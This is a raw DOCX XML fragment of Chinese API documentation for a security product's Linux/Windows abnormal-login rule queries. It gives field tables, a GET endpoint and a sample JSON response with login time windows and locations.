            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="575B7682" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>周期(周一到周日)，如[1,2,3,4,5,6,0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6873EF31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="loginlocations数据结构"/>
      <w:bookmarkEnd w:id="285"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>loginLocations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F9E774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2AC1B1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F993273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13315CD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67C36FA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="167D9774" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D5318C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47E9EA99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D9CFCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06055AEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>国家</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34D9FE79" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B280BD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>province</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A5A201F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8F4550" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0962F83D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>省</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A020220" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A043848" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>city</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EEFF134" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="560549EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23F21AFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>市</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A185187" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC81F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F126CA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DECB4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="287" w:name="_Toc115166216"/>
      <w:bookmarkStart w:id="288" w:name="查询多条规则"/>
      <w:bookmarkEnd w:id="282"/>
      <w:bookmarkEnd w:id="286"/>
      <w:r>
        <w:t>查询多条规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="287"/>
    </w:p>
    <w:p w14:paraId="7E298529" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E66757" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371733C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormallogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1029EB21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1517"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D351A8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32E0D4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08C14BA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A7FB867" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10D241DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="264F911A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294811E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE28E06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A6F593E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBF69EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1BBFD283" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557E4A6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F9B8A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F2D809C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FABC561" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28FBAEE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A70A58F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormallogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C4527" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645B9B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5a9d026a7d761b3ccfcf2c3d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmKind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmAgentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmAgentGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "condition": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginIps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginTimes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "start": "08:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "end": "10:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startMinutes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 480,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>endMinutes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 600,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "weeks": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            3</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginLocations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "country": "中国",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "province": "北京",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        "city": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>combineType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>combineTypeAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF2856F"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925"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3974"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1111A07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1F5D901" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F92C17F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C15FF92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FA8D74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="24E4D643" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C44C7EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25B67D68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F5BC25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="423FCE94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49789E6F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79FCA1A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD27149" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0350F3D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53A70506" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统类型：1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5548B0E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3362DE58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F89D86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C0096D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
